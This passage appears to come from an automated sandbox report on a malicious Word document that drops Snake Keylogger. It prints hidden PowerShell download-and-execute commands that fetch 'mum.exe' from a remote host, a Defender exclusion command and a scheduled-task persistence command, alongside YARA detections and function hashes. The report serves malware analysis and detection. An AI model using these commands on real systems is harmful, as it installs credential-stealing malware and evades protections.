Aug 23, 2022 13:43:56.912651062 CEST	1748	IN	HTTP/1.1 200 OK Date: Tue, 23 Aug 2022 11:43:56 GMT Content-Type: text/html Content-Length: 102 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>

Target ID:	0
Start time:	13:42:14
Start date:	23/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f410000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	13:42:20
Start date:	23/08/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Imagebase:	0x13f720000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	13:42:28
Start date:	23/08/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x4acb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	13:42:29
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Target ID:	9
Start time:	13:42:30
Start date:	23/08/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Imagebase:	0x13f100000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937588508.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937344564.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: powershell.exePID: 1808, Parent PID: 1724

General

Target ID:	11
Start time:	13:42:37
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Imagebase:	0x21c40000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	13:42:38
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp
Imagebase:	0x610000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	15
Start time:	13:42:41
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	16
Start time:	13:42:41
Start date:	23/08/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x4acb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 684, Parent PID: 2728

General

Target ID:	18
Start time:	13:42:42
Start date:	23/08/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
Imagebase:	0x13f3a0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.962416931.000000000026E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.964450317.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

Analysis Process: mum.exePID: 2520, Parent PID: 1672

General

Target ID:	19
Start time:	13:42:42
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	21
Start time:	13:42:51
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Imagebase:	0x21cf0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: schtasks.exePID: 2940, Parent PID: 2520

General

Target ID:	23
Start time:	13:42:51
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp
Imagebase:	0xe30000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	25
Start time:	13:42:55
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	26
Start time:	13:42:56
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	27
Start time:	13:43:10
Start date:	23/08/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x4acb0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mum.exePID: 2708, Parent PID: 1732

General

Target ID:	29
Start time:	13:43:10
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	30
Start time:	13:43:16
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
Imagebase:	0x21b20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: schtasks.exePID: 544, Parent PID: 2708

General

Target ID:	32
Start time:	13:43:17
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
Imagebase:	0xa20000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	34
Start time:	13:43:20
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Roaming\mum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\mum.exe
Imagebase:	0x11b0000
File size:	829952 bytes
MD5 hash:	06C16E9A1807F8754D73C6B77E978D02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	35
Start time:	13:43:29
Start date:	23/08/2022
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xff6c0000
File size:	11776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	36
Start time:	13:43:31
Start date:	23/08/2022
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT
Imagebase:	0xff3c0000
File size:	193536 bytes
MD5 hash:	B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	37
Start time:	13:44:46
Start date:	23/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0xff7d0000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Function 000007FF002807BA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923527344.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
Instruction ID: 7124490244aa5ef4451e390dd16296ae8c3d111d94112d62d7462eb385d4d442
Opcode Fuzzy Hash: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
Instruction Fuzzy Hash: 30E0D811B29C0B0FFBD0666C684A7B573C0E754313F500076E80CC26E7DD29F9454381

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 1724, Parent PID: 2348COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	0

Executed Functions

Function 00240911 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 0024093E
(Fl, xrefs: 00240B65

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: (Fl$48l
API String ID: 0-2888918871
Opcode ID: df6d5da292d224cba89dc474667beb86a17370b5070ffb87084a5dff0a632f96
Instruction ID: 655d6d859742e452b1eb3feb29640871d53d6d983427bf532653f64b62ef41b1
Opcode Fuzzy Hash: df6d5da292d224cba89dc474667beb86a17370b5070ffb87084a5dff0a632f96
Instruction Fuzzy Hash: A1E18A35A10229CFDB14DF79D884AAEB7B2BFC9305B11C629E405EB764DB30A9458F90

Uniqueness

Uniqueness Score: -1.00%

Function 00241CA2 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00241DCE
.*=, xrefs: 00241D5C

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: $.*=
API String ID: 0-954985398
Opcode ID: 5091a5fef49f5a38f7d7a7851545266683813687feb8e29c48d72e691dfe27c5
Instruction ID: fc6c56b410a5d3cd194bfedd1d28c42e3da708af7889b043dd5969875d99d80f
Opcode Fuzzy Hash: 5091a5fef49f5a38f7d7a7851545266683813687feb8e29c48d72e691dfe27c5
Instruction Fuzzy Hash: 9151EF75B101158FCB18DF68D8805AEBBB2EFC93157158176E909CB755EB30ECA58B80

Uniqueness

Uniqueness Score: -1.00%

Function 00241990 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

tl, xrefs: 00241A0D

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: tl
API String ID: 0-379094156
Opcode ID: 9bca0fc51fff3c85174ca48fa103819c23800f43ef89d08716105dbe66ece087
Instruction ID: 287dbb3999b2bf023d9edc8b5010dffadb70fc28a9dea589a05a86e9a1ffbfd9
Opcode Fuzzy Hash: 9bca0fc51fff3c85174ca48fa103819c23800f43ef89d08716105dbe66ece087
Instruction Fuzzy Hash: 85818C32F205259FD714DB69D880AAEB3E3AFC8754F1A8065E809DB765DB30EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00240588 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

(Fl, xrefs: 00240701

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: 1cddb941f64a5a2227e57ce3c2d22be6d7795e709496d9f6ea0b0cf71e0cb264
Instruction ID: 0647bf1b319c492b9064875e5850212f38ed884f3038c6f2997cccdbe86fbf18
Opcode Fuzzy Hash: 1cddb941f64a5a2227e57ce3c2d22be6d7795e709496d9f6ea0b0cf71e0cb264
Instruction Fuzzy Hash: 1A7119B8D5020EDFDF14CFA9D4859ADBBB1BF88310F10A659D412EB290DB31A991CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00241A31 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d290ae60caacb0ea45fb8dc1b8f26b713186b02f70a04039c46dbb75a78b9bcc
Instruction ID: 9222c6df91e20a8d17064fe9a375fe360ea9ae4eedfb0988e5fe4e3972f2503a
Opcode Fuzzy Hash: d290ae60caacb0ea45fb8dc1b8f26b713186b02f70a04039c46dbb75a78b9bcc
Instruction Fuzzy Hash: 27616B32F205259FD714DB69CC80BAEB3A3AFC8714F2A8065E8199B765DA34DC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 048B89A0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ce8027ccb235f93ce94a24625ad72d8d6b6826469e201592d12dda760bdb0b
Instruction ID: ad2c6b2e81927779860f58f081e09bf472c54a88b80398a5bca54947ef142871
Opcode Fuzzy Hash: a5ce8027ccb235f93ce94a24625ad72d8d6b6826469e201592d12dda760bdb0b
Instruction Fuzzy Hash: 39512C70E1910CCFCB04EFA5D4405EDBBBAAF89314F14A926D056F7314EB30A8459F95

Uniqueness

Uniqueness Score: -1.00%

Function 00243699 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad0acd54d6b28decf9e2a0dadfa0308d992bc311cbed9cf1370ade281a808d82
Instruction ID: 4f2510d2e94c406889ade92c99c2b517751fa693eb4a97368b926161fc809cca
Opcode Fuzzy Hash: ad0acd54d6b28decf9e2a0dadfa0308d992bc311cbed9cf1370ade281a808d82
Instruction Fuzzy Hash: 0D21A971E156489BDB19CFABC80059EFBF7AFC9300F18C07A9418AB269DB705A06CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00240114 Relevance: 4.2, Strings: 3, Instructions: 424
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 00242A4A
=, xrefs: 00242ADA
+, xrefs: 00242D52

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: b29960cb41e26b99b88da02fec13fdd71bc9c295965162f797b5b6909ef9e9b2
Instruction ID: aa489a60462d5d7549b46f28e0aab031a1892f91ac7359a9cc9143c155458b6c
Opcode Fuzzy Hash: b29960cb41e26b99b88da02fec13fdd71bc9c295965162f797b5b6909ef9e9b2
Instruction Fuzzy Hash: F5023F34610604CFCB58EF78C495A9DB7A6AF89304F1184BCD90A9F369DF39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00242941 Relevance: 4.2, Strings: 3, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+, xrefs: 00242A4A
=, xrefs: 00242ADA
+, xrefs: 00242D52

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: 13d43b78c93e2870e81bcf33c971adeaa7937e3544e0dc4627a617b7ce6ce317
Instruction ID: 3103dcd057988e5d95579713c19d24554412017e9d47b3c9d4140706cc031ae5
Opcode Fuzzy Hash: 13d43b78c93e2870e81bcf33c971adeaa7937e3544e0dc4627a617b7ce6ce317
Instruction Fuzzy Hash: 27024D34610604CFCB58EF78C495A9EB7A6AF89304F1184BCD90A9F369DF39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00246E30 Relevance: 3.9, Strings: 3, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002473EB
`!l, xrefs: 002473FB
,/l, xrefs: 00247193

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: ,/l$`!l$`!l
API String ID: 0-3429197752
Opcode ID: 87dfd168de92a39b8ddedf9cace7f65fa9fa0dacd292453730edd25eadbdc962
Instruction ID: 5be2918ce5b58780560fb2ccf16a45c7bebcdd6546d2aac17efc0748785786e9
Opcode Fuzzy Hash: 87dfd168de92a39b8ddedf9cace7f65fa9fa0dacd292453730edd25eadbdc962
Instruction Fuzzy Hash: AA61BF70A29619CFC708CF64C544ABEF7F2EF45700F548516E066AB292C774EC90CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00242F60 Relevance: 2.6, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002430A4
`!l, xrefs: 002430B0

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: `!l$`!l
API String ID: 0-3986300676
Opcode ID: 12d52d4301c761bd9225f86e0827e293379b8d1af6b519651d0362d4eb7a64b2
Instruction ID: 3eb28359d7d43a6c0286a9790b9cfb3610294d5db42687d78b52ddad879df401
Opcode Fuzzy Hash: 12d52d4301c761bd9225f86e0827e293379b8d1af6b519651d0362d4eb7a64b2
Instruction Fuzzy Hash: 7541CF347001148FC748EF78C455A6E7BF2AF8A310B2581A9E916DF7A6DF30DC158BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00241750 Relevance: 2.6, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.*=, xrefs: 002417CF
, xrefs: 00241862

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: $.*=
API String ID: 0-954985398
Opcode ID: b62e467e6946936154dfdad5315ac8231e2d395059f7ecdf419b546a9f4d43ed
Instruction ID: 3e6fa2db534a6b198b04b90e35fa22bda64b32914d33ad8ea9c9cbd11350f5b7
Opcode Fuzzy Hash: b62e467e6946936154dfdad5315ac8231e2d395059f7ecdf419b546a9f4d43ed
Instruction Fuzzy Hash: D241CF71F2010A8FDB14CFA9D8846AEBBB6FB85311B158526D514DB705D330ECA1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00245E48 Relevance: 2.6, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 00245E8A
48l, xrefs: 00245F8E

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

